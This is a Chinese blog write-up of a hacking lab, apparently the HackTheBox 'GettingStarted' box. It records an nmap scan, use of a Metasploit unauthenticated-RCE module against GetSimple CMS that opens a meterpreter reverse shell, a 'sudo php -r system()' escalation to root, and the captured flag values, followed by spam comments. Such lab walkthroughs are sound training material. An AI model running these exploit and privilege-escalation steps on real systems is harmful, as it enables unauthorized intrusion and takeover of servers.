每日一练
题目
解答
题目一
首先nmap扫描,进行信息收集
┌──(root㉿HgTrojan)-[~]
└─# nmap -sV -sC 10.129.86.24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-26 06:00 EST
Nmap scan report for 10.129.86.24
Host is up (1.1s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
| 256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_ 256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to GetSimple! - gettingstarted
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/admin/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.36 seconds
msf搜索GetSimple存在的漏洞
┌──(root㉿HgTrojan)-[~]
└─# msfconsole
Metasploit tip: Start commands with a space to avoid saving them to history
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'
=[ metasploit v6.3.51-dev ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
search GetSimple
msf6 > search GetSimple
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability
1 exploit/multi/http/getsimplecms_unauth_code_exec 2019-04-28 excellent Yes GetSimpleCMS Unauthenticated RCE
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/getsimplecms_unauth_code_exec
msf6 >
利用漏洞获取立足点
msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show options
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-m
etasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the cms
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.5.10.131 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 GetSimpleCMS 3.3.15 and before
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 10.129.86.24
rhosts => 10.129.86.24
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set lhost tun0
lhost => 10.10.16.25
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.10.16.25:4444
[*] Sending stage (39927 bytes) to 10.129.86.24
[*] Meterpreter session 1 opened (10.10.16.25:4444 -> 10.129.86.24:36112) at 2024-01-26 06:06:14 -0500
[*] Sending stage (39927 bytes) to 10.129.86.24
[*] Meterpreter session 2 opened (10.10.16.25:4444 -> 10.129.86.24:36116) at 2024-01-26 06:06:25 -0500
meterpreter >
查找目标txt文件并输出,完成第一题
meterpreter > cd /home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040755/rwxr-xr-x 4096 dir 2021-05-07 10:28:39 -0400 mrb3n
meterpreter > cd mrb3n
meterpreter > ls
Listing: /home/mrb3n
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
020666/rw-rw-rw- 0 cha 2024-01-26 04:01:36 -0500 .bash_history
100644/rw-r--r-- 220 fil 2020-02-25 07:03:22 -0500 .bash_logout
100644/rw-r--r-- 3771 fil 2020-02-25 07:03:22 -0500 .bashrc
040700/rwx------ 4096 dir 2021-02-09 04:12:07 -0500 .cache
100644/rw-r--r-- 807 fil 2020-02-25 07:03:22 -0500 .profile
100644/rw-r--r-- 0 fil 2021-02-09 05:56:38 -0500 .sudo_as_admin_successful
100600/rw------- 10332 fil 2021-05-07 10:28:39 -0400 .viminfo
100664/rw-rw-r-- 33 fil 2021-02-16 06:00:55 -0500 user.txt
meterpreter > cat user.txt
7002d65b149b0a4d19132a66feed21d8
第二题
利用php shell 来完成
语句参考:https://gtfobins.github.io/gtfobins/php/
详细过程:
meterpreter > shell
Process 75314 created.
Channel 1 created.
whoami
www-data
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
#我们可以发现在/usr/bin/php,我们(即:www-data)有all权限
#启动一个 /bin/sh 的 Shell
CMD="/bin/sh"
#以超级用户权限用PHP直接执行代码,代码内容为调用 PHP 的 system 函数,用于执行系统命令。它会执行 $CMD 变量中存储的 Shell 命令,这里即为 /bin/sh。
sudo php -r "system('$CMD');"
#如此我们就获取到了root权限
whoami
root
查找目标txt文件并输出,完成第二题
cat /root/root.txt
f1fba6e9f71efb2630e6e34da6387842
打赏: 支付宝
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
It's going to bee ending of mine day, bbut before ending I am reading this fantastic paragraph to
improve my knowledge.
tokekwin
You actually make it seem so easy with your presentation but I find this
topic to be actually something which I think I would never understand.
It seems too complicated and very broad for
me. I am looking forward for your next post, I will try to
get the hang of it!
I'm now not positive the place you're getting your information, however good topic.
I needs to spend a while learning more or working out
more. Thanks for magnificent info I was in search of this info for my mission.
Thank you for liking it
I've been exploring for a little for any high-quality articles or weblog posts on this sort of house .
Exploring in Yahoo I ultimately stumbled upon this site.
Reading this info So i am glad to convey that I've an incredibly good
uncanny feeling I discovered exactly what I needed.
I such a lot indisputably will make certain to do not fail to remember this site and
provides it a glance on a continuing basis.
Thank you for liking it
Just wish to say your article is as astonishing.
The clearness for your post is simply great and that i can think you are knowledgeable on this
subject. Fine along with your permission let me to grab your feed to stay up to date with forthcoming post.
Thanks a million and please carry on the gratifying work.
Of course. Thank you for liking it
I think that what you published was very reasonable.
However, think on this, what if you added a little information? I mean, I
don't wish to tell you how to run your website, but what if
you added something that grabbed people's attention? I mean 每日一练 - HgTrojan is kinda plain. You could peek at Yahoo's
front page and see how they create news titles
to get viewers to click. You might add a related video
or a picture or two to get readers interested about everything've got to say.
In my opinion, it might make your website a little bit more interesting.
Thank you
Hi there would you mind sharing which blog platform you're using?
I'm planning to start my own blog soon but I'm having a hard time deciding between BlogEngine/Wordpress/B2evolution and Drupal.
The reason I ask is because your layout seems different then most
blogs and I'm looking for something completely unique.
P.S My apologies for getting off-topic but I had to
ask!
Typecho